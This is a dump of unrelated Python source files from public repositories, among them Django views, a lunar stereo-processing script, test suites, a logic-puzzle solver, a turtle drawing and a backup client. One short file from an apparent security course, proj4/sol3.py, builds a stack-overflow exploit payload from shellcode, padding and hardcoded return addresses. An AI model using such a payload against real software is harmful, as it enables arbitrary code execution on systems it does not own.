photo_id = models.IntegerField()
num_task1 = models.IntegerField()
num_task2 = models.IntegerField()
num_tags = models.IntegerField()
tags = models.TextField()
def __str__(self):
return "PhotoId: " + str(self.photo_id) + ", num_task1: " + str(self.num_task1) + ", num_task2 " + \
str(self.num_task2) + ", num_tags: " + str(self.num_tags) + ", tags: " + str(self.tags)
class Meta:
db_table = u'photo_list'
"""
Satchless
An e-commerce framework for Python
"""
import logging
from . import process
from . import item
from . import cart
__all__ = ['cart', 'item', 'process']
class SatchlessBaseError(Exception):
"""Base Exception class
:note: This will try to use the logging module
:param message: the Exception message
:type message: str
:param data: Used to format the message string
"""
def __init__(self, message, data=None):
try:
message = message % data
except:
pass
# log the message using the class name
logging.getLogger( self.__class__.__name__ ).exception( message )
Exception.__init__(self, message)
class SatchlessBaseClass(object):
"""Base class used throughout satchless
"""
ArgsError = SatchlessBaseError
KwargsError = SatchlessBaseError
ParamError = SatchlessBaseError
LOG = None
def logit(self, message, level=logging.DEBUG):
"""Write `message` to logging
:param message: String to send
:param level: Desired log level (Default: logging.DEBUG)
:raises: satchless.SBase.ParamError
"""
if not self.LOG:
# use subclass name, not SBase
self.LOG = getLogger( self.__class__.__name__ )
try:
getattr( self.LOG, level )(message)
except:
raise ParamError("could not find level (%s) in self.LOG" % level)
UTF-8
Python
false
false
2,014
5,085,241,307,243
17c0683ae47e4b322c968bcb59e18239ab66b994
cbbb728c0cf2256693dd99444638e207701fb8c5
/institutions/respondants/views.py
3b8628feb18eb2d932274099441fc272c6861795
[
"CC0-1.0"
]
permissive
virtix/mapusaurus
https://github.com/virtix/mapusaurus
4f306485d581f01638f12994383976ede625a4d3
93047a837faf43b2c6ec16111900a11ccce0b51a
refs/heads/master
2021-01-15T22:09:52.251027
2014-05-29T11:12:27
2014-05-29T11:12:27
20,239,367
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponseRedirect
from respondants.forms import InstitutionSearchForm
from respondants.models import Institution
def respondant(request, respondant_id):
respondant = get_object_or_404(Institution, pk=respondant_id)
context = {'respondant':respondant}
parents = [respondant]
p = respondant.parent
while p:
parents.append(p)
p = p.parent
last = parents[-1]
if last.non_reporting_parent:
context['non_reporting_parent'] = last.non_reporting_parent
parents = parents[1:]
context['parents'] = reversed(parents)
return render(
request,
'respondants/respondant.html',
context
)
def index(request):
""" The main view. Display the institution search box here. """
if request.method == 'POST':
form = InstitutionSearchForm(request.POST)
if form.is_valid():
name_contains = form.cleaned_data['name_contains']
return HttpResponseRedirect(
'/institutions/search/?q=%s' % name_contains)
else:
form = InstitutionSearchForm()
return render(
request,
'respondants/index.html',
{'search_form': form}
)
def search(request):
institution_name = request.GET.get('q', '')
results = {}
if institution_name:
institution_name = institution_name.upper()
respondant_results = Institution.objects.filter(
name__contains=institution_name)
if len(respondant_results) > 0:
results['respondants'] = respondant_results
return render(
request,
'respondants/search_results.html',
{'results': results}
)
UTF-8
Python
false
false
2,014
10,771,777,988,466
0f8faf02d2c7d23c2319208ba994d2b20df59479
295d5d38e364a87f0c06353a7e183bad73ae9767
/src/asp/Tools/lronac4staged.py.in
d9d5a382668acb02da1cbeb5ccb7742d829e358c
[
"Apache-2.0"
]
permissive
figo829/StereoPipeline
https://github.com/figo829/StereoPipeline
871b04abb23abd87a94354482d406ecb0dd9879c
a062181bc70a93f2dd6d2bccef649938de39d200
refs/heads/master
2021-01-17T23:09:40.936110
2013-03-28T20:35:48
2013-03-28T20:45:21
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python
# __BEGIN_LICENSE__
# Copyright (c) 2009-2012, United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration. All
# rights reserved.
#
# The NGT platform is licensed under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# __END_LICENSE__
import os, glob, optparse, re, shutil, subprocess, sys, string
job_pool = [];
def man(option, opt, value, parser):
print >>sys.stderr, parser.usage
print >>sys.stderr, '''\
This program creates directories and runs cam2map for the 4 stereo
combinations needed to create an entire LRO-NAC frame.
It can also run the following steps:
* Stereo for each session
* Point2dem for each session
'''
sys.exit()
class Usage(Exception):
def __init__(self, msg):
self.msg = msg
def add_job( cmd, num_working_threads=4, cwd=None ):
if ( len(job_pool) >= num_working_threads):
job_pool[0].wait();
job_pool.pop(0);
print cmd;
job_pool.append( subprocess.Popen(cmd, shell=True, cwd=cwd) );
def wait_on_all_jobs():
print "Waiting for jobs to finish";
while len(job_pool) > 0:
job_pool[0].wait();
job_pool.pop(0);
class JobDescription:
def __init__(self, name, left, right):
self.name = name
self.left = left
self.right = right
self.left_prefix = prefix(left)
self.right_prefix = prefix(right)
def prefix( filename ):
return filename[:filename.find('.')]
def build_session_directory(job_desc, options):
# Create Directory
if os.path.isdir(job_desc.name) and options.force:
os.system("rm -rf %s" % job_desc.name)
if not os.path.isdir(job_desc.name):
os.system("mkdir %s" % job_desc.name)
# Create Symlinks
symlinks = [job_desc.left, job_desc.right, "stereo.default"]
for target in symlinks:
if os.path.exists(os.path.join(job_desc.name,target)) and options.force:
subprocess.Popen("rm %s" % target, shell=True, cwd=job_desc.name)
if not os.path.exists(os.path.join(job_desc.name,target)):
subprocess.Popen("ln -s ../%s" % target, shell=True, cwd=job_desc.name)
# Run cam2map
if os.path.exists(os.path.join(job_desc.name,job_desc.left_prefix+".map.cub")) and options.force:
subprocess.Popen("rm %s" % (job_desc.left_prefix+".map.cub"),shell=True, cwd=job_desc.name)
if os.path.exists(os.path.join(job_desc.name,job_desc.right_prefix+".map.cub")) and options.force:
subprocess.Popen("rm %s" % (job_desc.right_prefix+".map.cub"),shell=True, cwd=job_desc.name)
if not os.path.exists(os.path.join(job_desc.name, job_desc.left_prefix+".map.cub")) or not os.path.exists(os.path.join(job_desc.name, job_desc.right_prefix+".map.cub")):
cmd = "cam2map4stereo.py %s %s" % (job_desc.left,job_desc.right)
add_job(cmd, options.threads, job_desc.name)
def stereo( job_desc, threads, additional ):
cmd = "stereo %s.map.cub %s.map.cub stereo/%s %s" % (job_desc.left_prefix,job_desc.right_prefix,job_desc.name,additional)
add_job(cmd, threads, job_desc.name)
pass
def point2dem( job_desc, threads, additional ):
cmd = "point2dem -r moon %s/stereo/%s-PC.tif %s" % (job_desc.name,job_desc.name,additional)
add_job(cmd, threads)
pass
#---------------------------
def main():
try:
try:
usage = "usage: lronac4staged.py [--help][--manual][--threads N] LRONAC_CAL.CUB-files\n [ASP [@]ASP_VERSION[@]]"
parser = optparse.OptionParser(usage=usage)
parser.set_defaults(delete=True)
parser.set_defaults(threads=4)
parser.add_option("--manual", action="callback", callback=man,
help="Read the manual.")
parser.add_option("-t", "--threads", dest="threads",
help="Number of threads to use.",type="int")
parser.add_option("--force", dest="force", action="store_true",
help="Force overwriting of previous process's directories.")
parser.add_option("--stereo", dest="stereo", action="store_true",
help="Perform stereo on each session.")
parser.add_option("--point2dem", dest="point2dem", action="store_true",
help="Perform point2dem on each session.")
parser.add_option("--args", dest="args",
help="Additional arguments to apply to your command", type="string")
(options, args) = parser.parse_args()
if not len(args) == 4: parser.error("need 4 *.CUB files")
except optparse.OptionError, msg:
raise Usage(msg)
args.sort()
jobs = []
jobs.append( JobDescription("LELE", args[0], args[2]) )
jobs.append( JobDescription("RERE", args[1], args[3]) )
jobs.append( JobDescription("LERE", args[0], args[3]) )
jobs.append( JobDescription("RELE", args[1], args[2]) )
for job in jobs:
build_session_directory( job, options )
wait_on_all_jobs()
if options.stereo:
for job in jobs:
stereo( job, options.threads, options.args )
wait_on_all_jobs()
if options.point2dem:
for job in jobs:
point2dem( job, options.threads, options.args )
wait_on_all_jobs()
print "Finished"
return 0
except Usage, err:
print >>sys.stderr, err.msg
# print >>sys.stderr, "for help use --help"
return 2
# To more easily debug this program, comment out this catch block.
# except Exception, err:
# sys.stderr.write( str(err) + '\n' )
# return 1
if __name__ == "__main__":
sys.exit(main())
#encoding=utf8
from __future__ import unicode_literals
import requests
from bs4 import BeautifulSoup
import json
import webbrowser
def safeSelectText(s,path):
return s.select(path)[0].text if len(s.select(path)) > 0 else ""
def query(key):
r = requests.get('http://v2ex.com/?tab=all')
bs = BeautifulSoup(r.text)
results = []
for i in bs.select(".box div.item"):
res = {}
title = safeSelectText(i,".item_title")
subTitle = safeSelectText(i,".fade")
url = "http://v2ex.com" + i.select(".item_title a")[0]["href"]
res["Title"] = title
res["SubTitle"] = subTitle
res["ActionName"] = "openUrl"
res["IcoPath"] = "Images\\app.ico"
res["ActionPara"] = url
results.append(res)
return json.dumps(results)
def openUrl(url):
webbrowser.open(url)
if __name__ == "__main__":
print query("movie geo")
UTF-8
Python
false
false
2,014
3,332,894,648,679
8cad73fdb8ebcd578ee6131e27f6ff3beb1e199e
237472502fb403aef44a690f90e586864e1eb672
/proj4/sol3.py
4d75356fbcce0fa9708adf8117deeb32e72061be
[
"CC0-1.0"
]
permissive
jiaxiluo/Security
https://github.com/jiaxiluo/Security
50369580cc8d7add3f2f50009d59f7acab08f224
af8f20728e872cf2fa825ee7aea6eda5fdd28fa7
refs/heads/master
2016-09-06T11:42:59.779106
2014-12-04T18:57:09
2014-12-04T18:57:09
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from struct import pack
from shellcode import shellcode
print shellcode + "a" * (2048 - 23) + pack("<I", 0xbffe90c8) + pack("<I", 0xbffe98dc)
UTF-8
Python
false
false
2,014
14,370,960,603,720
6a9bbd494a8118170c2e408acf716b771b132bcb
7f44f150c820e1b5e2539b4ac26c23a1a00556de
/string_to_list_test.py
2c4ee314d51c0b1edc088c17c2123a9d060b6bd3
[]
no_license
kuuot/web-python
https://github.com/kuuot/web-python
4500f75e0ab35295aa36a21e18fdf8bf8e322732
d974e133c1a268336d9f11579ba1177eaf8e529f
refs/heads/master
2015-08-18T05:13:06.915003
2014-12-22T08:42:49
2014-12-22T08:42:49
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# Terrence Kuo
# Citation: https://www.udacity.com/course/cs101
# About: Testing out funtionality of the StringToList() class
import string_to_list
if __name__ == "__main__":
# create object
manipulate = string_to_list.StringToList();
# add words to list
manipulate.add_words("After, there/as he-was. he and it. was, asdf \n hi", " ./\n-,");
print manipulate;
# add more words to list
#manipulate.add_words("You=now thats it's a/ good day. when something!!! happens....", " =!./\n-,");
#print manipulate;
# add words to list from html content
#manipulate.detag("<!DOCTYPE html> <body> Hi there my name is well you know what it is it is </body> regular person");
#print manipulate
# removes character:
#manipulate.remove_char("i");
#print manipulate;
# removes multiple character:
#manipulate.remove_char("it");
#print manipulate;
# removes word
#manipulate.remove_words("After");
#print manipulate;
# removes multiple word
#manipulate.remove_words("After there he");
#print manipulate;
# removes word with specfied character
#manipulate.remove_words_with_char("h");
#print manipulate;
# replaces word
#manipulate.replace_word("After", "abc");
#print manipulate;
# remove repeated words
#manipulate.remove_repeats();
#print manipulate;
UTF-8
Python
false
false
2,014
2,156,073,599,821
525af838df69a2a92861bb1faaf2867222a225ec
d88e79d82ef37bc060c915baa29136c3e8acd61f
/test/test_api.py
c571b98c1abbf6f7d099a68c13c44f5bdea2981d
[]
no_license
koolhead17/hypernotes
https://github.com/koolhead17/hypernotes
7f6085c8ad6be321cbc3dd1a1f97853b26da4fa8
43073d2cc3503b5f0c6ef50411b66aa362e53459
refs/heads/master
2016-10-12T01:47:11.044708
2011-08-09T11:48:55
2011-08-09T11:48:55
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import json
from hypernotes import web
from hypernotes import logic
TESTDB = 'hypernotes-test'
class TestApi(object):
@classmethod
def setup_class(cls):
web.app.config['ELASTIC_SEARCH_HOST'] = '127.0.0.1:9200'
web.app.config['ELASTIC_DB'] = TESTDB
logic.init_db()
cls.app = web.app.test_client()
cls.make_fixtures()
@classmethod
def teardown_class(cls):
conn, db = logic.get_conn()
conn.delete_index(TESTDB)
@classmethod
def make_fixtures(self):
self.username = u'tester'
inuser = {
'id': self.username,
'fullname': 'The Tester'
}
indata = {
'title': 'My New Note',
'body': '## Xyz',
'tags': ['abc', 'efg'],
'owner': self.username
}
self.app.post('/api/v1/user', data=json.dumps(inuser))
out = self.app.post('/api/v1/note', data=json.dumps(indata))
self.note_id = json.loads(out.data)['id']
self.thread_name = 'default'
inthread = {
'name': self.thread_name,
'title': 'My Test Thread',
'description': 'None at the moment',
'notes': [ self.note_id ],
'owner': self.username
}
out = self.app.post('/api/v1/thread', data=json.dumps(inthread))
self.thread_id = json.loads(out.data)['id']
def test_user(self):
res = self.app.get('/api/v1/user/%s' % self.username)
data = json.loads(res.data)
assert data['fullname'] == 'The Tester', data
def test_note(self):
res = self.app.get('/api/v1/note/%s' % self.note_id)
assert res.status_code == 200, res.status
data = json.loads(res.data)
assert data['body'] == '## Xyz', data
def test_note_search_no_query(self):
res = self.app.get('/api/v1/note?q=')
assert res.status_code == 200, res.status
data = json.loads(res.data)
count = data['result']['hits']['total']
assert count == 1, count
def test_note_search_2_basic_text(self):
res = self.app.get('/api/v1/note?q=new')
assert res.status_code == 200, res.status
data = json.loads(res.data)
count = data['result']['hits']['total']
assert count == 1, count
def test_note_search_3_should_not_match(self):
res = self.app.get('/api/v1/note?q=nothing-that-should-match')
assert res.status_code == 200, res.status
data = json.loads(res.data)
count = data['result']['hits']['total']
assert count == 0, count
def test_thread(self):
res = self.app.get('/api/v1/thread/%s' % self.thread_id)
assert res.status_code == 200, res.status
data = json.loads(res.data)
assert data['title'] == 'My Test Thread', data
res = self.app.get('/api/v1/%s/thread/%s' % (self.username,
self.thread_name), follow_redirects=True)
assert res.status_code == 200, res.status
data = json.loads(res.data)
assert data['title'] == 'My Test Thread', data
def test_thread_update(self):
id_ = 'testupdate'
indata = {
'id': id_,
'title': 'Abc'
}
res = self.app.post('/api/v1/thread', data=json.dumps(indata))
indata2 = {
'id': id_,
'title': 'Xyz'
}
res = self.app.put('/api/v1/thread/%s' % id_, data=json.dumps(indata2))
out = logic.Thread.get(id_)
assert out['title'] == 'Xyz', out
UTF-8
Python
false
false
2,011
10,033,043,627,914
6fb8583375ab7029d3863fe4757cd2bb0d90ee1f
8ab66dcf8e91734d730f7799839ceddfa289b4cd
/barnacle-1.0.0/src/parsers/genes/ensembl.py
619010af380aafc6d9b30e3e22d36a809e4f94b6
[]
no_license
ptraverse/gsc
https://github.com/ptraverse/gsc
7bbbe67652575b5e7d3ca68e85a213fd7536125d
21e6b699f91cf9604f973d51745c3975cbd8e22c
refs/heads/master
2021-01-23T17:58:50.910026
2013-01-03T09:06:05
2013-01-03T09:06:05
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
"""
ensembl.py
Created by Readman Chiu
Edited by Lucas Swanson
Copyright (c) 2012 Canada's Michael Smith Genome Sciences Centre. All rights reserved.
"""
import transcript
from optparse import OptionParser
import os, re
#for ensGene.txt from UCSC
fields_a = {1:"name", 2:"chrom", 3:"strand", 4:"txStart", 5:"txEnd",
6:"cdsStart", 7:"cdsEnd", 8:"exonCount", 9:"exonStarts", 10:"exonEnds",
12:"alias"}
#for ensGene_ref.txt created in-house
fields_b = {0:"name", 2:"chrom", 3:"strand", 4:"txStart", 5:"txEnd",
6:"cdsStart", 7:"cdsEnd", 8:"exonCount", 9:"exonStarts", 10:"exonEnds",
16:"alias"}
def set_fields(file=None, line=None):
sep = name_field = None
fields = fields_a
#determine which ensGene file it is
if file:
for l in open(file, 'r'):
line = l
break
if line:
if line[:3].lower() != 'ens':
fields = fields_a
sep = "\t"
name_field = 1
else:
fields = fields_b
sep = " "
name_field = 0
return sep, name_field, fields
def parse(file):
txts = []
sep, name_field, fields = set_fields(file=file)
for line in open(file, 'r'):
cols = line.rstrip("\n").split(sep)
if cols[0]:
txt = transcript.Transcript(cols[name_field])
for i in range(len(cols)):
if i in fields:
if fields[i] == 'chrom' and cols[i][:3] != 'chr':
cols[i] = 'chr' + cols[i]
if i <= 10 or i == 16 or i == 12:
setattr(txt, fields[i], cols[i])
exonStarts = cols[9].rstrip(',').split(',')
exonEnds = cols[10].rstrip(',').split(',')
txt.exons = []
for e in range(len(exonStarts)):
#start+1: seems necessary at least for mouse ensembl file
txt.exons.append([int(exonStarts[e])+1, int(exonEnds[e])])
#calculate transcript length for coverage
for exon in txt.exons:
txt.length += int(exon[1]) - int(exon[0]) + 1
#print txt.name, txt.exonCount, txt.length, txt.exons[0]
txts.append(txt)
return txts
def parse_line(line):
sep, name_field, fields = set_fields(line=line)
cols = line.rstrip("\n").split(sep)
if sep and len(cols) > 1:
txt = transcript.Transcript(cols[name_field])
for i in range(len(cols)):
if i in fields:
if fields[i] == 'chrom' and cols[i][:3] != 'chr':
cols[i] = 'chr' + cols[i]
if i <= 10 or i == 16 or i == 12:
setattr(txt, fields[i], cols[i])
exonStarts = cols[9].rstrip(',').split(',')
exonEnds = cols[10].rstrip(',').split(',')
txt.exons = []
for e in range(len(exonStarts)):
txt.exons.append([int(exonStarts[e])+1, int(exonEnds[e])])
#calculate transcript length for coverage
for exon in txt.exons:
txt.length += int(exon[1]) - int(exon[0]) + 1
return txt
return None
def index(input, output):
sep, name_field, fields = set_fields(file=input)
indices = {}
data_file = os.path.abspath(input)
line_num = 1
for line in open(input, 'r'):
cols = line.rstrip().split(sep)
start = int(int(cols[4])/1000)
end = int(int(cols[5])/1000)
target = cols[2]
if not re.match('^(chr|scaffold)', target, re.IGNORECASE):
target = 'chr' + target
#print cols[0],target,start,end
for n in range(start,end+1):
index = ':'.join((target,str(n)))
value = str(line_num)
if not indices.has_key(index):
indices[index] = [value]
else:
indices[index].append(value)
line_num += 1
index_file = open(output, 'w')
for index in sorted(indices.keys()):
index_file.write(' '.join((index, ','.join(indices[index]))) + "\n")
def output(txts, outfile):
fields = fields_a
list_size = int(fields.keys()[-1])+1
field_idx = {}
for idx, field in fields.iteritems():
if field in ('exonStarts', 'exonEnds', 'exonCount'):
field_idx[field] = idx
out = open(outfile, 'w')
for i in range(len(txts)):
txt = txts[i]
data = []
for idx in range(list_size):
data.append('NA')
for idx, field in fields.iteritems():
try:
value = getattr(txt, field)
except AttributeError:
continue
else:
data[idx] = str(value)
data[0] = str(i)
data[field_idx['exonStarts']] = ','.join([str(int(i[0])-1) for i in txt.exons])
data[field_idx['exonEnds']] = ','.join([str(i[1]) for i in txt.exons])
data[field_idx['exonCount']] = str(len(txt.exons))
out.write('\t'.join(data) + '\n')
out.close()
if __name__ == '__main__':
usage = "Usage: %prog annotation-file"
parser = OptionParser(usage=usage)
parser.add_option("-i", "--index", dest="index", help="index output file")
(options, args) = parser.parse_args()
if options.index:
index(args[0], options.index)
UTF-8
Python
false
false
2,013
10,170,482,569,770
9fe0ecc6438502ba1baa363a7adb9dd9e18e3a08
8c8a50c1c3b01ec920184506eee31bee9165b208
/w7/logicpuzzle.py
7b3d6f589035a55eb05adf5fca560d04fa9616e0
[]
no_license
likhtal/CS212
https://github.com/likhtal/CS212
b9231337192dc3627c258da83ffe6e6a51ac5dcf
1968afd8a9757de9f19f00b12973fd0e773964af
refs/heads/master
2016-09-07T20:29:10.800748
2012-06-22T18:54:06
2012-06-22T18:54:06
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
"""
UNIT 2: Logic Puzzle
You will write code to solve the following logic puzzle:
1. The person who arrived on Wednesday bought the laptop.
2. The programmer is not Wilkes.
3. Of the programmer and the person who bought the droid,
one is Wilkes and the other is Hamming.
4. The writer is not Minsky.
5. Neither Knuth nor the person who bought the tablet is the manager.
6. Knuth arrived the day after Simon.
7. The person who arrived on Thursday is not the designer.
8. The person who arrived on Friday didn't buy the tablet.
9. The designer didn't buy the droid.
10. Knuth arrived the day after the manager.
11. Of the person who bought the laptop and Wilkes,
one arrived on Monday and the other is the writer.
12. Either the person who bought the iphone or the person who bought the tablet
arrived on Tuesday.
You will write the function logic_puzzle(), which should return a list of the
names of the people in the order in which they arrive. For example, if they
happen to arrive in alphabetical order, Hamming on Monday, Knuth on Tuesday, etc.,
then you would return:
['Hamming', 'Knuth', 'Minsky', 'Simon', 'Wilkes']
(You can assume that the days mentioned are all in the same week.)
"""
import itertools
def logic_puzzle():
"Return a list of the names of the people, in the order they arrive."
## your code here; you are free to define additional functions if needed
# return ['Wilkes', 'Simon', 'Knuth', 'Hamming', 'Minsky']
days = mon, tue, wed, thu, fri = [1, 2, 3, 4, 5]
orderings = list(itertools.permutations(days))
gen = (dict([(h, "Hamming"), (k,"Knuth"), (m,"Minsky"), (s,"Simon"), (w, "Wilkes")])
for (h, k, m, s, w) in orderings
if k == s + 1
for (programmer, writer, manager, designer, _) in orderings
if (programmer is not w)
and (writer is not m)
and (designer is not thu)
and (k == manager + 1)
and (writer is not mon)
for (laptop, droid, tablet, iphone, _) in orderings
if (laptop is wed)
and (tablet is not fri)
and (w is not laptop)
and (set([programmer, droid]) == set([w, h]))
and (programmer is not droid)
and (manager is not k and manager is not tablet)
and (designer is not droid)
and (set([w, laptop]) == set([mon, writer]))
and (iphone is tue or tablet is tue))
result = next(gen)
return [result[key] for key in range(1,6)]
print logic_puzzle()
UTF-8
Python
false
false
2,012
14,800,457,340,020
7bd281ab8753ced41145b2a3e7a8af86e31a70ad
9fffb8d0539a27722695ee1bf77afda2255f4120
/Python Codes/Project 04.py
6610fb275549666fc9f87c4eff1d7c1a2e9c9205
[]
no_license
mukasama/portfolio
https://github.com/mukasama/portfolio
fdde5f1b022cc3d7b5abf1c35e170ad9f5d3f401
92e1d231f76ad7473a2318da87e8b3817a9e4e5b
refs/heads/master
2016-09-07T15:41:07.331327
2014-10-19T17:53:42
2014-10-19T17:53:42
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# Section 09
# 10/ 08/ 2012
# Project 04
import turtle
turtle.goto(100,0)
# Function draw_rectangle, draws a rectangle with desginated lenght and height which then fills in the color(s).
def draw_rectangle(length,height,color):
turtle.pendown()
turtle.color(get_color(color))
turtle.begin_fill()
turtle.right(90)
turtle.forward(length)
turtle.right(90)
turtle.forward(height)
turtle.right(90)
turtle.forward(length)
turtle.right(90)
turtle.forward(height)
turtle.end_fill()
turtle.penup()
# Function draw_rectangle2 draws the outline of the rectangle with same lenght along with the desginated lenght, height and color.
def draw_rectangle2(length,height,color):
turtle.pendown()
turtle.color(get_color(color))
turtle.right(90)
turtle.forward(length)
turtle.right(90)
turtle.forward(height)
turtle.right(90)
turtle.forward(length)
turtle.right(90)
turtle.forward(height)
turtle.penup()
# The get_color function is used to determine red, blue and white colors from a parameter color sting.
def get_color(color):
if color == "red":
return 1,0,0
if color == "blue":
return 0,0,1
if color == "white":
return 1,1,1
if color == "black":
return 0,0,0
# Draw_star function draws a star with desginated angles and lengths which then fills it with the color.
def draw_star(size, color):
turtle.pendown()
turtle.begin_fill()
turtle.color(1,1,1)
turtle.forward(2.5)
turtle.left(size)
turtle.forward(2.5)
turtle.right(144)
turtle.forward(2.5)
turtle.left(size)
turtle.forward(2.5)
turtle.right(144)
turtle.forward(2.5)
turtle.left(size)
turtle.forward(2.5)
turtle.right(144)
turtle.forward(2.5)
turtle.left(size)
turtle.forward(2.5)
turtle.right(144)
turtle.forward(2.5)
turtle.left(size)
turtle.forward(2.5)
turtle.right(144)
turtle.end_fill()
turtle.penup()
# draw_flag is a function that draws a fag of a certain heing.
def draw_flag(height):
size = 72
color = "white"
# Letters "a" is just a variable I choose to complete my formula to draw the small blue rectangle.
for a in range(7):
turtle.speed(100)
turtle.down()
draw_rectangle(height/13,height*1.9,"red")
turtle.right(90)
turtle.forward((height/13)*2)
turtle.left(90)
draw_rectangle(height, height*1.9, "white")
turtle.goto(100,0)
draw_rectangle2(height,324,"black")
turtle.goto(-93.5, 0)
draw_rectangle(height*.5385,height*.76, "blue")
# Letters b, c, d, e, f, g, h, i, j, k are just variables I choose to complete my formula to draw the 50 stars.
turtle.goto(-218,-6)
for c in range(6):
draw_star(size, 'white')
turtle.forward(22)
turtle.goto(-209,-16)
for d in range(5):
draw_star(size, 'white')
turtle.forward(23)
turtle.goto(-218,-26)
for e in range(6):
draw_star(size, 'white')
turtle.forward(22)
turtle.goto(-209,-36)
for f in range(5):
draw_star(size, 'white')
turtle.forward(23)
turtle.goto(-218,-46)
for g in range(6):
draw_star(size, 'white')
turtle.forward(22)
turtle.goto(-209,-56)
for h in range(5):
draw_star(size, 'white')
turtle.forward(23)
turtle.goto(-218,-66)
for i in range(6):
draw_star(size, 'white')
turtle.forward(22)
turtle.goto(-209,-76)
for j in range(5):
draw_star(size, 'white')
turtle.forward(23)
turtle.goto(-218,-86)
for k in range(6):
draw_star(size, 'white')
turtle.forward(22)
draw_flag(170)
"""
Instrument class accessing metadata, mappings etc.
"""
from lib import common
from lib import schema
def get_reuters (symbol):
""" Get an instrument using a Reuters symbol """
symbol_resolve = schema.table.symbol_resolve
args = and_(symbol_resolve.columns.symbol==symbol, symbol_resolve.columns.source=="reuters")
matches = schema.select(symbol_resolve, args)
if matches.rowcount == 0:
raise Exception("Cannot map Reuters instrument %s" % symbol)
return Series(matches.fetchone()[2])
def get (symbol, create):
""" Get symbol definition """
symbol_instance = schema.select_one("symbol", schema.table.symbol.symbol==symbol)
if symbol_instance:
return symbol_instance
elif create:
symbol_instance = schema.table.symbol()
symbol_instance.symbol = symbol
return symbol_instance
else:
raise Exception("Unknown symbol (%s)", symbol)
UTF-8
Python
false
false
2,014
14,139,032,373,315
975a62f63da8ece923d0d3770343280bdbecf874
6be742824b1f4dd5f87b6afc63d823ad984c22e3
/tests/__init__.py
fec3b79eb679e0547d5d34218b0aea99ef724534
[
"AGPL-3.0-only"
]
non_permissive
BlackFlagConsortium/makershop
https://github.com/BlackFlagConsortium/makershop
d584c423aa9ad06c51ff772d5e25dbbaa21bf555
01bfb465538f28bbe20489887355af6c0bb4a5c1
refs/heads/master
2021-01-10T21:18:44.391962
2013-11-06T19:47:34
2013-11-06T19:47:34
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import pprint
import unittest
from flask import json
from makershop import create_app
from makershop.models import db
from .factories import UserFactory
class MakershopTestCase(unittest.TestCase):
def setUp(self):
#db.create_all(app=create_app())
self.app = create_app()
self.app.debug = True
#self.client = self.app.test_client()
with self.app.test_request_context():
db.drop_all()
db.create_all()
self.client = self.app.test_client()
def tearDown(self):
with self.app.test_request_context():
db.drop_all()
def assert_api_error(self, response, status_code, message):
if response.status_code != status_code:
raise AssertionError(
"HTTP Status: {actual} !== {expected}".format(
actual=response.status_code,
expected=status_code,
)
)
if json.loads(response.data) != {'message': message}:
raise AssertionError(
'returned JSON:\n\nGot: {}\n\nExpected: {}'.format(
response.data.decode('utf-8'),
json.dumps({'message': message})
)
)
class UserLoggedIn(MakershopTestCase):
def setUp(self):
super().setUp()
self.client = self.app.test_client()
with self.app.test_request_context():
self.user = UserFactory.create(password='foo')
self.client.post(
'/user/login/',
data={
'username': self.user.email,
'password': 'foo',
}
)
UTF-8
Python
false
false
2,013
4,200,478,039,695
989550166ca2d2f958d8c32743ab3da089fc5d1f
f4efd48507a830a0c1248393947ce5a74644bf28
/scripts/train_test_split.py
4771bd7788aee4613346cbe815966ea5ee66de7a
[]
no_license
pschulam-attic/ulm
https://github.com/pschulam-attic/ulm
25bfdfa947be3dfe96a005b224a4bb6862be54de
9f77ab18de2c9a5f18cc7b8daa944e58ed8c1e45
refs/heads/master
2016-09-06T17:19:47.952537
2013-05-09T17:21:39
2013-05-09T17:21:39
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import argparse
import random
import sys
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-p', help='Percentage of data for training', type=float)
parser.add_argument('--train', help='Write the training data to this file', default='train.txt')
parser.add_argument('--test', help='Write the test data to this file', default='test.txt')
parser.add_argument('--seed', help='Random seed (a string)', default='split')
args = parser.parse_args()
data = [l.strip() for l in sys.stdin if l.strip()]
random.seed(args.seed)
train_set = set(random.sample(xrange(len(data)), int(args.p * len(data))))
with open(args.train, 'w') as train, open(args.test, 'w') as test:
for i, d in enumerate(data):
stream = train if i in train_set else test
stream.write(d + '\n')
if __name__ == '__main__':
main()
UTF-8
Python
false
false
2,013
12,292,196,416,134
f622e338359c699204218cd6a1ac9f5e330bed8c
5f3dccbac5179b500054add89744220591ce838f
/client.py
3b0bd8e2968bc86f97b664900e4a1ee3e70844fa
[]
no_license
f-prime/IonicBackup
https://github.com/f-prime/IonicBackup
23cb1e49c45799a5a5c86a4216817f5dca1f51e5
17b467bfcfe41b959c1c0ace3d3d4627531ae2f4
refs/heads/master
2021-05-27T16:28:35.642015
2013-04-05T00:40:13
2013-04-05T00:40:13
8,789,289
4
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import socket, os, time, sys, thread, getpass, hashlib
class IonicClient:
def __init__(self, ip, port, username, password):
self.ip = ip
self.port = port
self.username = hashlib.sha256(username).hexdigest()
self.password = hashlib.sha256(password).hexdigest()
self.dirs = []
self.files = {}
for x,y,z in os.walk(os.getcwd()):
for b in z:
if b == sys.argv[0]:
continue
with open(x+"/"+b, 'rb') as file:
self.files[b.strip("/")] = hash(file.read())
def main(self):
while True:
try:
time.sleep(1)
stuff = self.list().split(":")
try:
dir = eval(stuff[0])
except SyntaxError:
print "\nLogin Failed"
break
file = eval(stuff[1])
for x in dir:
if not os.path.exists(x.strip("/")):
os.mkdir(x.strip("/"))
self.dirs.append(x)
for x in file:
if not os.path.exists(x) and x not in self.files:
self.get(x)
